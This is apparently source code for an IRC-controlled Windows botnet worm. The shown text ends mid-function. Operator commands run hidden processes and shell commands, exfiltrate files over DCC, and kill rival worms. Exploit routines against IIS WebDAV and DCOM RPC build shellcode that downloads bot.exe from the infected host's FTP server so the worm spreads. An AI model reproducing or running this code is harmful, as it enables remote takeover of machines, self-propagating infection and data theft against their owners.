bool CMac::HandleCommand(CMessage *pMsg)
{ if(!pMsg->sCmd.Compare("login"))
{ if(g_pMainCtrl->m_cMac.AddLogin(pMsg->sChatString.Token(1, " ", true), pMsg->sChatString.Token(2, " ", true), pMsg->sSrc, pMsg->sHost, pMsg->sIdentd))
{ CString sReply; sReply.Format("Password accepted.");
g_pMainCtrl->m_cIRC.SendMsg(pMsg->bSilent, pMsg->bNotice, sReply.Str(), pMsg->sReplyTo.Str());
return true; }
else return false; }
else if(!pMsg->sCmd.Compare("mac.logout"))
{ if(g_pMainCtrl->m_cMac.DelLogin(CString(""), pMsg->sSrc))
{ CString sReply; sReply.Format("User %s logged out.", pMsg->sSrc.CStr());
g_pMainCtrl->m_cIRC.SendMsg(pMsg->bSilent, pMsg->bNotice, sReply.Str(), pMsg->sReplyTo.Str());
return true; }
else return false; }
return false; }
bool CMac::CheckPassword(CString sPassword, user *pUser)
{ if(!sPassword.CStr()) return false;
md5::MD5_CTX md5; md5::MD5Init(&md5); unsigned char szMD5[16]; CString sMD5; sMD5.Assign("");
md5::MD5Update(&md5, (unsigned char*)sPassword.Str(), sPassword.GetLength());
md5::MD5Final(szMD5, &md5); for(int i=0;i<16;i++)
{ CString sTemp; sTemp.Format("%2.2X", szMD5[i]); sMD5.Append(sTemp); }
if(!pUser->sPassword.Compare(sMD5)) return true;
return false; }
CString::CString(const CString& str)
: length_(str.Length())
, reserved_(0) {
if ((string_ = static_cast<char*>(::malloc(length_ + 1))) == 0) {
base_throw(InternalError, "malloc failed");
}
::memcpy(static_cast<void*>(string_), str.Str(), length_);
string_[length_] = '\0';
}
bool CScannerHTTP::ExploitIISWebDav(int iHTTPType, unsigned short sRet) {
char szSCBuf[4096]; char szShellBuf[4096]; char *szReqBuf=(char*)malloc(100000);
unsigned short ret=sRet; int iShellSize=0, iPos=0, iSCSize=0, iReqSize=0, iNOPSize=100, rt=0, r=0;
CString sURL;
if(IsPrivate(g_pMainCtrl->m_pIRC->m_sLocalIp.CStr()) && !IsPrivate(m_sSocket.m_szHost))
sURL.Format("ftp://*****:*****@%s:%d/bot.exe", g_pMainCtrl->m_pIRC->m_sLocalHost.CStr(), \
g_pMainCtrl->m_pBot->bot_ftrans_port_ftp.iValue);
else
sURL.Format("ftp://*****:*****@%s:%d/bot.exe", inet_ntoa(to_in_addr(g_pMainCtrl->m_pIRC->m_lLocalAddr)), \
g_pMainCtrl->m_pBot->bot_ftrans_port_ftp.iValue);
iShellSize=setup_shellcode_udtf(szShellBuf, sizeof(szShellBuf), sURL.Str(), false);
// Build a buffer with the shellcode
memset(szSCBuf+iPos, '\x90', iNOPSize ); iPos+=iNOPSize;
memcpy(szSCBuf+iPos, szShellBuf, iShellSize ); iPos+=iShellSize;
iSCSize=iPos; iPos=0;
// Build the request
memset(szReqBuf, 0, 100000);
strcpy(szReqBuf, "SEARCH /");
unsigned int j, i=strlen(szReqBuf); szReqBuf[i]='\x90';
for(j=i+1; j<i+2150; j+=2) { *(unsigned short*)&szReqBuf[j]=(unsigned short)ret; } // EIP will be szReqBuf[8+2087]
for(;j<i+65535-strlen(jumpcode);j++) szReqBuf[j]='\x90'; // The rest is padded with NOP's. RET address should point to this zone!
memcpy(&szReqBuf[j], jumpcode, strlen(jumpcode)); // Then we skip the body of the HTTP request
strcpy(szReqBuf+strlen(szReqBuf), " HTTP/1.1\r\n");
sprintf(szReqBuf+strlen(szReqBuf), "Host: %s\r\nContent-Type: text/xml\r\nContent-Length: %d\r\n\r\n", m_sSocket.m_szHost, strlen(body)+iShellSize);
strcpy(szReqBuf+strlen(szReqBuf), body);
memset(szReqBuf+strlen(szReqBuf), 0x01, 1);
memset(szReqBuf+strlen(szReqBuf), 0x90, 3);
strcpy(szReqBuf+strlen(szReqBuf), szSCBuf);
iReqSize=strlen(szReqBuf);
// Connect to the server
if(!m_sSocket.Connect(m_sSocket.m_szHost, 80)) // Connect failed, exit
{ free(szReqBuf); return false; }
// Send the evil request
if(!m_sSocket.Write(szReqBuf, iReqSize)) { m_sSocket.Disconnect(); free(szReqBuf); return false; }
// Read reply
m_sSocket.RecvTO(szReqBuf, sizeof(szReqBuf), 5000);
// Close the socket that was once funky fresh
m_sSocket.Disconnect(); free(szReqBuf); return true; }
bool CBot::HandleCommand(CMessage *pMsg)
{
// ID
if(!pMsg->sCmd.Compare(m_cmdId.sName.CStr())) {
return g_cMainCtrl.m_cIRC.SendMsg(pMsg->bSilent, pMsg->bNotice, bot_id.sValue.Str(), pMsg->sReplyTo.Str());
}
// Execute
else if(!pMsg->sCmd.Compare(m_cmdExecute.sName.CStr()))
{
CString sText(pMsg->sChatString.Token(2, " ", true)); bool bVisible=atoi(pMsg->sChatString.Token(1, " ").CStr())==1;
#ifdef WIN32
CString sTextExp; ExpandEnvironmentStrings(sText.CStr(), sTextExp.GetBuffer(8192), 8192); // interpret environment variables
sText.Assign(sTextExp);
PROCESS_INFORMATION pinfo;
STARTUPINFO sinfo;
memset(&sinfo, 0, sizeof(STARTUPINFO));
sinfo.cb=sizeof(sinfo);
if(bVisible) sinfo.wShowWindow=SW_SHOW; else sinfo.wShowWindow=SW_HIDE;
if(!CreateProcess(NULL, sText.Str(), NULL, NULL, TRUE, NORMAL_PRIORITY_CLASS | DETACHED_PROCESS, NULL, NULL, &sinfo, &pinfo)) {
g_cMainCtrl.m_cIRC.SendMsg(pMsg->bSilent, pMsg->bNotice, "exec.error", pMsg->sReplyTo.Str()); return false; }
#endif
return true;
}
// Remove Bot
else if(!pMsg->sCmd.Compare(m_cmdRemove.sName.Str()))
{
CString sNick(pMsg->sChatString.Token(1, " ", true));
if (!sNick.Compare(g_cMainCtrl.m_sUserName.CStr())) {
if(g_cMainCtrl.m_cBot.as_enabled.bValue)
g_cMainCtrl.m_cInstaller.RegStartDel(g_cMainCtrl.m_cBot.as_valname.sValue);
if(g_cMainCtrl.m_cBot.as_service.bValue)
g_cMainCtrl.m_cInstaller.ServiceDel(g_cMainCtrl.m_cBot.as_service_name.sValue);
g_cMainCtrl.m_cInstaller.Uninstall();
g_cMainCtrl.m_cIRC.m_bRunning=false;
g_cMainCtrl.m_bRunning=false;
}
}
// About
else if(!pMsg->sCmd.Compare(m_cmdAbout.sName.CStr())) {
return g_cMainCtrl.m_cIRC.SendMsg(pMsg->bSilent, pMsg->bNotice, g_cMainCtrl.m_sNameVerStr.Str(), pMsg->sReplyTo.Str());
}
// Flush DNS
else if(!pMsg->sCmd.Compare(m_cmdFlushDNS.sName.CStr()))
{
#ifdef WIN32
// ipconfig.exe /flushdns
Execute(dp(9,16,3,15,14,6,9,7,78,5,24,5,0).CStr(), dp(80,6,12,21,19,8,4,14,19,0).CStr());
#endif
return true;
}
// Open File
else if(!pMsg->sCmd.Compare(m_cmdOpen.sName.CStr()))
{
CString sText;
sText=pMsg->sChatString.Token(1, " ").CStr();
CString bRet;
bRet=(char)ShellExecute(
NULL,
"open",
sText.CStr(),
NULL,
NULL,
SW_SHOWNORMAL
);
// bRet=system(sText.CStr())>0;
// if(bRet) return g_cMainCtrl.m_cIRC.SendMsg(pMsg->bSilent, pMsg->bNotice, "file opened.", pMsg->sReplyTo.Str());
//else return
g_cMainCtrl.m_cIRC.SendMsg(pMsg->bSilent, pMsg->bNotice, bRet.Str(), pMsg->sReplyTo.Str());
}
// Quit
else if(!pMsg->sCmd.Compare(m_cmdQuit.sName.CStr()))
{
g_cMainCtrl.m_cIRC.m_bRunning=false;
return true;
}
// DNS
else if(!pMsg->sCmd.Compare(m_cmdDns.sName.CStr()))
{
CString sReply;
hostent *pHostent=NULL;
in_addr iaddr;
if(!pMsg->sChatString.Token(1, " ").Compare("")) return false;
unsigned long addr=inet_addr(pMsg->sChatString.Token(1, " ").CStr());
if(addr!=INADDR_NONE) {
pHostent=gethostbyaddr((char*)&addr, sizeof(struct in_addr), AF_INET);
if(pHostent) {
sReply.Format("%s resolved %s", pMsg->sChatString.Token(1, " ").CStr(), pHostent->h_name);
return g_cMainCtrl.m_cIRC.SendMsg(pMsg->bSilent, pMsg->bNotice, sReply.Str(), pMsg->sReplyTo.Str());
}
} else {
pHostent=gethostbyname(pMsg->sChatString.Token(1, " ").CStr());
if(pHostent) {
iaddr=*((in_addr*)*pHostent->h_addr_list);
sReply.Format("%s -> %s", pMsg->sChatString.Token(1, " ").CStr(), inet_ntoa(iaddr));
return g_cMainCtrl.m_cIRC.SendMsg(pMsg->bSilent, pMsg->bNotice, sReply.Str(), pMsg->sReplyTo.Str());
}
}
if(!pHostent) {
sReply.Format("resolve.error %s.", pMsg->sChatString.Token(1, " ").CStr());
return g_cMainCtrl.m_cIRC.SendMsg(pMsg->bSilent, pMsg->bNotice, sReply.Str(), pMsg->sReplyTo.Str());
}
}
// Random Nickname
else if(!pMsg->sCmd.Compare(m_cmdRndNick.sName.CStr()))
{
CString sRndNick=RndNick(si_nickprefix.sValue.CStr());
g_cMainCtrl.m_cIRC.SendRawFormat("%s %s\r\n", dp(40,35,29,37,0).CStr(), sRndNick.CStr());
g_cMainCtrl.m_sUserName.Format("%s", sRndNick.Mid(0, 32).CStr());
return true;
}
// Run Command
else if(!pMsg->sCmd.Compare(m_cmdCommand.sName.CStr()))
{
#ifdef WIN32
if(!(pMsg->sChatString.GetLength() > (pMsg->sCmd.GetLength()+pMsg->sChatString.Token(1, " ").GetLength()+3))) return false;
CString sText; sText.Assign(&pMsg->sChatString[pMsg->sCmd.GetLength()+2]);
bool bRet=false;
CString sReplyBuf;
sReplyBuf.Format("Executed: %s.", sText.CStr());
if(system(sText.CStr())==-1)
{
g_cMainCtrl.m_cIRC.SendMsg(pMsg->bSilent, pMsg->bNotice, "exec.error", pMsg->sReplyTo.Str()); return false;
} else {
g_cMainCtrl.m_cIRC.SendMsg(pMsg->bSilent, pMsg->bNotice, sReplyBuf.Str(), pMsg->sReplyTo.Str()); return false;
}
#endif
return true;
}
// System Information
else if(!pMsg->sCmd.Compare(m_cmdSysInfo.sName.CStr()))
{
return g_cMainCtrl.m_cIRC.SendMsg(pMsg->bSilent, pMsg->bNotice, SysInfo().Str(), pMsg->sReplyTo.Str());
}
// Find Files
//else if(!pMsg->sCmd.Compare(m_cmdFindFiles.sName.CStr()))
// {
/* CString strMask = pMsg->sChatString.Token(1, " ");
CString strDir = pMsg->sChatString.Token(2, " ");
return g_cMainCtrl.m_cIRC.SendMsg(pMsg->bSilent, pMsg->bNotice, FindFiles(strMask, strDir), pMsg->sReplyTo.Str());
*/
//}
// Change Nickname
else if(!pMsg->sCmd.Compare(m_cmdNick.sName.CStr()))
{
g_cMainCtrl.m_sUserName.Format("%s", pMsg->sChatString.Token(1, " ", true).Mid(0, 32).CStr());
g_cMainCtrl.m_cIRC.SendRawFormat("%s %s\r\n", dp(40,35,29,37,0).CStr(), g_cMainCtrl.m_sUserName.CStr());
return true;
}
// Uptime check (default: 7d)
else if(!pMsg->sCmd.Compare(m_cmdLongUptime.sName.CStr()))
{
int iDays=atoi(pMsg->sChatString.Token(1, " ").CStr());
if(!iDays) iDays=7;
CString sUptime=LongUptime(iDays);
if(sUptime.Compare("")) {
g_cMainCtrl.m_cIRC.SendMsg(pMsg->bSilent, pMsg->bNotice, \
sUptime.Str(), pMsg->sReplyTo.Str());
}
return true;
}
// Secure Bot
else if(!pMsg->sCmd.Compare(m_cmdSecure.sName.CStr()))
{
#ifdef WIN32
CString regLoc;
regLoc = dp(45,15,6,20,23,1,18,5,80,39,9,3,18,15,19,15,6,20,80,49,9,14,4,15,23,19,80,29,21,18,18,5,14,20,48,5,18,19,9,15,14,80,44,21,14,0).CStr();
HKEY hkey=NULL; DWORD dwSize=128; char szDataBuf[128];
strcpy(szDataBuf, "N"); dwSize=strlen(szDataBuf);
LONG lRet=RegOpenKeyEx(HKEY_LOCAL_MACHINE, "Software\\Microsoft\\OLE", 0, KEY_READ, &hkey);
RegSetValueEx(hkey, dp(31,14,1,2,12,5,30,29,41,39,0).CStr(), NULL, REG_SZ, (unsigned char*)szDataBuf, dwSize);
RegCloseKey(hkey);
lRet=RegOpenKeyEx(HKEY_LOCAL_MACHINE, regLoc.CStr(), 0, KEY_ALL_ACCESS, &hkey);
RegDeleteValue(hkey, dp(45,19,1,20,5,78,5,24,5,0).CStr());
RegCloseKey(hkey);
KillProcess(dp(9,18,21,14,72,78,5,24,5,0).CStr());
CString tmpBagle; GetSystemDirectory(tmpBagle.GetBuffer(MAX_PATH), MAX_PATH);
tmpBagle.Format("%s\\%s",tmpBagle.CStr(), dp(9,18,21,14,72,78,5,24,5,0).CStr());
DeleteFile(tmpBagle);
lRet=RegOpenKeyEx(HKEY_LOCAL_MACHINE, regLoc.CStr(), 0, KEY_ALL_ACCESS, &hkey);
RegDeleteValue(hkey, dp(18,1,20,5,78,5,24,5,0).CStr());
RegCloseKey(hkey);
KillProcess(dp(9,69,69,18,73,72,14,72,78,5,24,5,0).CStr());
GetSystemDirectory(tmpBagle.GetBuffer(MAX_PATH), MAX_PATH);
tmpBagle.Format("%s\\%s",tmpBagle.CStr(),dp(9,69,69,18,73,72,14,72,78,5,24,5,0).CStr());
DeleteFile(tmpBagle);
lRet=RegOpenKeyEx(HKEY_LOCAL_MACHINE, regLoc.CStr(), 0, KEY_ALL_ACCESS, &hkey);
RegDeleteValue(hkey, dp(19,19,1,20,5,78,5,24,5,0).CStr());
RegCloseKey(hkey);
KillProcess(dp(23,9,14,19,25,19,78,5,24,5,0).CStr());
GetSystemDirectory(tmpBagle.GetBuffer(MAX_PATH), MAX_PATH);
tmpBagle.Format("%s\\%s",tmpBagle.CStr(), dp(23,9,14,19,25,19,78,5,24,5,0).CStr());
DeleteFile(tmpBagle);
lRet=RegOpenKeyEx(HKEY_LOCAL_MACHINE, regLoc.CStr(), 0, KEY_ALL_ACCESS, &hkey);
RegDeleteValue(hkey, dp(4,71,4,21,16,4,1,20,5,78,5,24,5,0).CStr());
RegCloseKey(hkey);
KillProcess(dp(2,2,5,1,7,12,5,78,5,24,5,0).CStr());
GetSystemDirectory(tmpBagle.GetBuffer(MAX_PATH), MAX_PATH);
tmpBagle.Format("%s\\%s",tmpBagle.CStr(), dp(2,2,5,1,7,12,5,78,5,24,5,0).CStr());
DeleteFile(tmpBagle);
lRet=RegOpenKeyEx(HKEY_LOCAL_MACHINE, regLoc.CStr(), 0, KEY_ALL_ACCESS, &hkey);
RegDeleteValue(hkey, dp(46,1,19,11,39,15,14,0).CStr());
RegCloseKey(hkey);
KillProcess(dp(20,1,19,11,13,15,14,78,5,24,5,0).CStr());
GetSystemDirectory(tmpBagle.GetBuffer(MAX_PATH), MAX_PATH);
tmpBagle.Format("%s\\%s",tmpBagle.CStr(), dp(20,1,19,11,13,15,14,78,5,24,5,0).CStr());
DeleteFile(tmpBagle);
lRet=RegOpenKeyEx(HKEY_LOCAL_MACHINE, regLoc.CStr(), 0, KEY_ALL_ACCESS, &hkey);
RegDeleteValue(hkey, dp(31,24,16,12,15,18,5,18,0).CStr());
RegCloseKey(hkey);
system("net share c$ /delete /y");
system("net share d$ /delete /y");
system("net share ipc$ /delete /y");
system("net share admin$ /delete /y");
#endif
return true;
}
return false;
}
bool CScannerDCOM2::Exploit()
{ char szRecvBuf[4096], szSCBuf[4096], szLoadBuf[4096], szReqBuf[4096], szShellBuf[4096], szLoaderBuf[4096];
int iShellSize=0, iLoaderSize=0, iPos=0, iSCSize=0, iLoadSize=0, iReqSize=0;
char *pTemp;
int iHostOS=FpHost(m_sSocket.m_szHost, FP_RPC);
if(iHostOS==OS_UNKNOWN || iHostOS==OS_WINNT) return false;
CString sURL;
if(IsPrivate(g_pMainCtrl->m_pIRC->m_sLocalIp.CStr()) && !IsPrivate(m_sSocket.m_szHost))
sURL.Format("ftp://*****:*****@%s:%d/bot.exe", g_pMainCtrl->m_pIRC->m_sLocalHost.CStr(), \
g_pMainCtrl->m_pBot->bot_ftrans_port_ftp.iValue);
else
sURL.Format("ftp://*****:*****@%s:%d/bot.exe", inet_ntoa(to_in_addr(g_pMainCtrl->m_pIRC->m_lLocalAddr)), \
g_pMainCtrl->m_pBot->bot_ftrans_port_ftp.iValue);
iShellSize=setup_shellcode_udtf(szShellBuf, sizeof(szShellBuf), sURL.Str(), false);
iLoaderSize=encrypt_shellcode(dcom2_loader, sizeof(dcom2_loader), szLoaderBuf, sizeof(szLoaderBuf), NULL);
memcpy(szLoadBuf+iPos, dcom2_shellcode_buf, sizeof(dcom2_shellcode_buf) ); iPos+=sizeof(dcom2_shellcode_buf);
memcpy(szLoadBuf+DCOM2_SCBUF_OFFSET_SC, szLoaderBuf, iLoaderSize );
memcpy(szLoadBuf+DCOM2_SCBUF_OFFSET_SC, dcom2_shellcode_adduser,sizeof(dcom2_shellcode_adduser) );
memcpy(szLoadBuf+DCOM2_SCBUF_OFFSET_JMP_ADDR, &dcom2_my_offsets[0].lJmpAddr, 4 );
memcpy(szLoadBuf+DCOM2_SCBUF_OFFSET_TOP_SEH, &dcom2_my_offsets[0].lTopSEH, 4 );
iLoadSize=iPos; iPos=0;
// Build the request
memcpy(szReqBuf+iPos, dcom2_request1, sizeof(dcom2_request1)-1 ); iPos+=sizeof(dcom2_request1)-1;
memcpy(szReqBuf+iPos, dcom2_request2, sizeof(dcom2_request2)-1 ); iPos+=sizeof(dcom2_request2)-1;
memcpy(szReqBuf+iPos, szLoadBuf, iLoadSize ); iPos+=iLoadSize;
memcpy(szReqBuf+iPos, dcom2_request3, sizeof(dcom2_request3)-1 ); iPos+=sizeof(dcom2_request3)-1;
memcpy(szReqBuf+iPos, dcom2_request4, sizeof(dcom2_request4)-1 ); iPos+=sizeof(dcom2_request4)-1;
iReqSize=iPos; iPos=0;
pTemp=szReqBuf+sizeof(dcom2_request1)-1; // Fill the request with the right sizes
*(unsigned long*)(pTemp) = *(unsigned long*)(pTemp) + iLoadSize / 2;
*(unsigned long*)(pTemp+8) = *(unsigned long*)(pTemp+8) + iLoadSize / 2; pTemp=szReqBuf;
*(unsigned long*)(pTemp+8) = *(unsigned long*)(pTemp+8) + iLoadSize - 12;
*(unsigned long*)(pTemp+16) = *(unsigned long*)(pTemp+16) + iLoadSize - 12;
*(unsigned long*)(pTemp+128) = *(unsigned long*)(pTemp+128) + iLoadSize - 12;
*(unsigned long*)(pTemp+132) = *(unsigned long*)(pTemp+132) + iLoadSize - 12;
*(unsigned long*)(pTemp+180) = *(unsigned long*)(pTemp+180) + iLoadSize - 12;
*(unsigned long*)(pTemp+184) = *(unsigned long*)(pTemp+184) + iLoadSize - 12;
*(unsigned long*)(pTemp+208) = *(unsigned long*)(pTemp+208) + iLoadSize - 12;
*(unsigned long*)(pTemp+396) = *(unsigned long*)(pTemp+396) + iLoadSize - 12;
char szAssocGroup[4];
// Connect to the server
if(!m_sSocket.Connect(m_sSocket.m_szHost, m_sSocket.m_sPort)) // Connect failed, exit
return false;
// Send the bind string
if(!m_sSocket.Write(dcom2_bindstr, sizeof(dcom2_bindstr)-1))
{ m_sSocket.Disconnect(); return false; }
// Read reply
if(!m_sSocket.Recv(szRecvBuf, sizeof(szRecvBuf)))
{ m_sSocket.Disconnect(); return false; }
// Check for DCE_PKT_BINDACK
if(szRecvBuf[2]!=DCE_PKT_BINDACK) { m_sSocket.Disconnect(); return false; }
// Store the association group for later usage
memcpy(szAssocGroup, szRecvBuf+20, 4);
// Send the evil request
if(!m_sSocket.Write(szReqBuf, iReqSize))
{ m_sSocket.Disconnect(); return false; }
// Read reply
if(!m_sSocket.Recv(szRecvBuf, sizeof(szRecvBuf)))
{ m_sSocket.Disconnect(); return false; }
// Check for DCE_PKT_FAULT
if(szRecvBuf[2]==DCE_PKT_FAULT) { m_sSocket.Disconnect(); return false; }
// Close the socket that was once funky fresh
m_sSocket.Disconnect(); return true;
}
bool CDccCommand::HandleCommand(CMessage *pMsg)
{
if(!pMsg->sCmd.Compare(m_cmdDccSend.sName.Str()))
{
DCC dcc;
dcc.filename=pMsg->sChatString.Token(1, " ", true);
char sendbuf[IRCLINE],buffer[1024],tmpfile[MAX_PATH];
int Fsend, bytes_sent;
unsigned int move;
unsigned __int64 totalbytes = 0;
DWORD mode = 0;
SOCKET ssock;
while (1) {
if ((ssock = socket(AF_INET, SOCK_STREAM, 0)) == INVALID_SOCKET) {
sprintf(sendbuf,"[DCC]: Failed to create socket.");
break;
}
SOCKADDR_IN csin, ssin;
memset(&ssin, 0, sizeof(ssin));
ssin.sin_family = AF_INET;
ssin.sin_port = htons(0);//random port
ssin.sin_addr.s_addr = INADDR_ANY;
if (bind(ssock, (LPSOCKADDR)&ssin, sizeof(ssin)) != 0) {
g_cMainCtrl.m_cIRC.SendMsg(pMsg->bSilent, pMsg->bNotice, "dcc: failed to bind socket", pMsg->sReplyTo.Str());
break;
}
int ssin_len = sizeof(ssin);
getsockname(ssock, (LPSOCKADDR)&ssin, &ssin_len);
unsigned short portnum = ntohs(ssin.sin_port);
char tmpdccfile[IRCLINE];
strcpy(tmpdccfile,dcc.filename.Str());
for (unsigned int i=0;i <= strlen(tmpdccfile); i++)
tmpfile[i] = ((tmpdccfile[i] == 32)?(95):(tmpdccfile[i]));
if (listen(ssock, 1) != 0) {
g_cMainCtrl.m_cIRC.SendMsg(pMsg->bSilent, pMsg->bNotice, "dcc: failed to open socket", pMsg->sReplyTo.Str());
break;
}
HANDLE testfile = CreateFile(dcc.filename.CStr(),GENERIC_READ,FILE_SHARE_READ,0,OPEN_EXISTING,0,0);
if (testfile == INVALID_HANDLE_VALUE) {
g_cMainCtrl.m_cIRC.SendMsg(pMsg->bSilent, pMsg->bNotice, "dcc: file doesn't exist", pMsg->sReplyTo.Str());
sprintf(sendbuf,"[DCC]: File doesn't exist.");
break;
}
int length = GetFileSize(testfile,NULL);
CString dccOutPut;
dccOutPut.Format("\1DCC SEND %s %i %i %i\1",
dcc.filename.CStr(),
htonl(inet_addr(GetIP(g_cMainCtrl.m_cIRC.m_sSocket))),
portnum, length);
g_cMainCtrl.m_cIRC.SendMsg(pMsg->bSilent, pMsg->bNotice, dccOutPut.Str(), pMsg->sSrc);
TIMEVAL timeout;
timeout.tv_sec = 60;//timeout after 60 sec.
timeout.tv_usec = 0;
fd_set fd_struct;
FD_ZERO(&fd_struct);
FD_SET(ssock, &fd_struct);
if (select(0, &fd_struct, NULL, NULL, &timeout) <= 0) {
g_cMainCtrl.m_cIRC.SendMsg(pMsg->bSilent, pMsg->bNotice, "dcc: timeout", pMsg->sReplyTo.Str());
break;
}
int csin_len = sizeof(csin);
if ((dcc.csock = accept(ssock, (LPSOCKADDR)&csin, &csin_len)) == INVALID_SOCKET) {
g_cMainCtrl.m_cIRC.SendMsg(pMsg->bSilent, pMsg->bNotice, "dcc: unable to open socket", pMsg->sReplyTo.Str());
break;
}
closesocket(ssock);
while (length) {
Fsend = 1024;
if (Fsend>length)
Fsend=length;
move = 0-length;
memset(buffer,0,sizeof(buffer));
SetFilePointer(testfile, move, NULL, FILE_END);
ReadFile(testfile, buffer, Fsend, &mode, NULL);
bytes_sent = send(dcc.csock, buffer, Fsend, 0);
totalbytes += bytes_sent;
if (recv(dcc.csock,buffer ,sizeof(buffer), 0) < 1 || bytes_sent < 1) {
g_cMainCtrl.m_cIRC.SendMsg(pMsg->bSilent, pMsg->bNotice, "dcc: socket error", pMsg->sReplyTo.Str());
closesocket(dcc.csock);
//clearthread(dcc.threadnum);
ExitThread(1);
}
length = length - bytes_sent;
}
if (testfile != INVALID_HANDLE_VALUE)
CloseHandle(testfile);
CString strTransMsg;
strTransMsg.Format("dcc: complete to %s, file: %s, (%d bytes)",
inet_ntoa(csin.sin_addr), dcc.filename.Str(), totalbytes);
g_cMainCtrl.m_cIRC.SendMsg(pMsg->bSilent, pMsg->bNotice, strTransMsg.Str(), pMsg->sReplyTo.Str());
break;
}
if (ssock > 0)
closesocket(ssock);
closesocket(dcc.csock);
//clearthread(dcc.threadnum);
ExitThread(0);
}
return FALSE;
}
bool CScannerDCOM::Exploit()
{
switch(m_sSocket.m_sPort)
{
case 135:
case 1025:
{
char szRecvBuf[4096]; char szSCBuf[4096]; char szReqBuf[4096]; char szShellBuf[4096];
int iShellSize=0, iPos=0, iSCSize=0, iReqSize=0, iNOPSize=sizeof(nops)-1;
char *pTemp; int iHostOS=FpHost(m_sSocket.m_szHost, FP_RPC);
if(iHostOS==OS_UNKNOWN) iHostOS=FpHost(m_sSocket.m_szHost, FP_SMB);
if(iHostOS==OS_WINNT) return false;
CString sURL;
if(IsPrivate(g_pMainCtrl->m_cIRC.m_sLocalIp.CStr()) && !IsPrivate(m_sSocket.m_szHost))
sURL.Format("ftp://*****:*****@%s:%d/bot.exe", g_pMainCtrl->m_cIRC.m_sLocalHost.CStr(), \
g_pMainCtrl->m_cBot.bot_ftrans_port_ftp.iValue);
else
sURL.Format("ftp://*****:*****@%s:%d/bot.exe", inet_ntoa(to_in_addr(g_pMainCtrl->m_cIRC.m_lLocalAddr)), \
g_pMainCtrl->m_cBot.bot_ftrans_port_ftp.iValue);
iShellSize=setup_shellcode_udtf(szShellBuf, sizeof(szShellBuf), sURL.Str(), false);
// Build a buffer with the shellcode
memcpy(szSCBuf+iPos, shellcode_start, sizeof(shellcode_start)-1 ); iPos+=sizeof(shellcode_start)-1;
memset(szSCBuf+iPos, '\x90', iNOPSize ); iPos+=iNOPSize;
memcpy(szSCBuf+iPos, szShellBuf, iShellSize ); iPos+=iShellSize;
iSCSize=iPos; iPos=0;
// Prepend NOPs as long as shellcode doesn't fit RPC packet format
while(iSCSize%16!=12)
{ char *szTemp=(char*)malloc(iSCSize+1); iNOPSize++;
memcpy(szSCBuf+iPos, shellcode_start, sizeof(shellcode_start)-1 ); iPos+=sizeof(shellcode_start)-1;
memset(szSCBuf+iPos, '\x90', iNOPSize ); iPos+=iNOPSize;
memcpy(szSCBuf+iPos, szShellBuf, iShellSize ); iPos+=iShellSize;
iSCSize=iPos; iPos=0; free(szTemp); }
// Set the return address
if(iHostOS==OS_WINXP || iHostOS==OS_UNKNOWN)
memcpy(szSCBuf+36, (char*)&my_offsets[1], 4);
else
memcpy(szSCBuf+36, (char*)&my_offsets[0], 4);
// Build the request
memcpy(szReqBuf+iPos, request1, sizeof(request1)-1 ); iPos+=sizeof(request1)-1;
memcpy(szReqBuf+iPos, request2, sizeof(request2)-1 ); iPos+=sizeof(request2)-1;
memcpy(szReqBuf+iPos, szSCBuf, iSCSize ); iPos+=iSCSize;
memcpy(szReqBuf+iPos, request3, sizeof(request3)-1 ); iPos+=sizeof(request3)-1;
memcpy(szReqBuf+iPos, request4, sizeof(request4)-1 ); iPos+=sizeof(request4)-1;
iReqSize=iPos;
pTemp=szReqBuf+sizeof(request1)-1; // Fill the request with the right sizes
*(unsigned long*)(pTemp) = *(unsigned long*)(pTemp) + iSCSize / 2;
*(unsigned long*)(pTemp+8) = *(unsigned long*)(pTemp+8) + iSCSize / 2; pTemp=szReqBuf;
*(unsigned long*)(pTemp+8) = *(unsigned long*)(pTemp+8) + iSCSize - 12;
*(unsigned long*)(pTemp+16) = *(unsigned long*)(pTemp+16) + iSCSize - 12;
*(unsigned long*)(pTemp+128) = *(unsigned long*)(pTemp+128) + iSCSize - 12;
*(unsigned long*)(pTemp+132) = *(unsigned long*)(pTemp+132) + iSCSize - 12;
*(unsigned long*)(pTemp+180) = *(unsigned long*)(pTemp+180) + iSCSize - 12;
*(unsigned long*)(pTemp+184) = *(unsigned long*)(pTemp+184) + iSCSize - 12;
*(unsigned long*)(pTemp+208) = *(unsigned long*)(pTemp+208) + iSCSize - 12;
*(unsigned long*)(pTemp+396) = *(unsigned long*)(pTemp+396) + iSCSize - 12;
// Connect to the server
if(!m_sSocket.Connect(m_sSocket.m_szHost, m_sSocket.m_sPort)) // Connect failed, exit
return false;
// Send the bind string
if(!m_sSocket.Write(bindstr, sizeof(bindstr)-1)) { m_sSocket.Disconnect(); return false; }
// Read reply
m_sSocket.RecvTO(szRecvBuf, sizeof(szRecvBuf), 5000);
// Send the evil request
if(!m_sSocket.Write(szReqBuf, iReqSize)) { m_sSocket.Disconnect(); return false; }
// Read reply
if(!m_sSocket.RecvTO(szRecvBuf, sizeof(szRecvBuf), 5000)) { m_sSocket.Disconnect(); return false; }
// Close the socket that was once funky fresh
m_sSocket.Disconnect(); return true;
}
break;
case 445:
{
#ifdef _WIN32
NETRESOURCEW nr; bool bRetVal=false;
if(!ConnectViaNullSession(m_sSocket.m_szHost, &nr)) return bRetVal;
else
{ int iHostOS=FpHost(m_sSocket.m_szHost, FP_NP);
if(iHostOS==OS_UNKNOWN) iHostOS=FpHost(m_sSocket.m_szHost, FP_SMB);
char szPipePath[MAX_PATH];
sprintf(szPipePath, "\\\\%s\\pipe\\epmapper", m_sSocket.m_szHost);
HANDLE hFile=CreateFile(szPipePath, GENERIC_WRITE|GENERIC_READ, FILE_SHARE_READ, \
NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
if(hFile!=INVALID_HANDLE_VALUE)
{
SendLocal("%s: connected to pipe \\\\%s\\pipe\\epmapper.", m_sScannerName.CStr(), m_sSocket.m_szHost);
char szSCBuf[4096]; char szReqBuf[4096]; char szShellBuf[4096];
int iShellSize=0, iPos=0, iSCSize=0, iReqSize=0, iNOPSize=sizeof(nops)-1;
char *pTemp;
CString sURL;
if(IsPrivate(g_pMainCtrl->m_cIRC.m_sLocalIp.CStr()) && !IsPrivate(m_sSocket.m_szHost))
sURL.Format("ftp://*****:*****@%s:%d/bot.exe", g_pMainCtrl->m_cIRC.m_sLocalHost.CStr(), \
g_pMainCtrl->m_cBot.bot_ftrans_port_ftp.iValue);
else
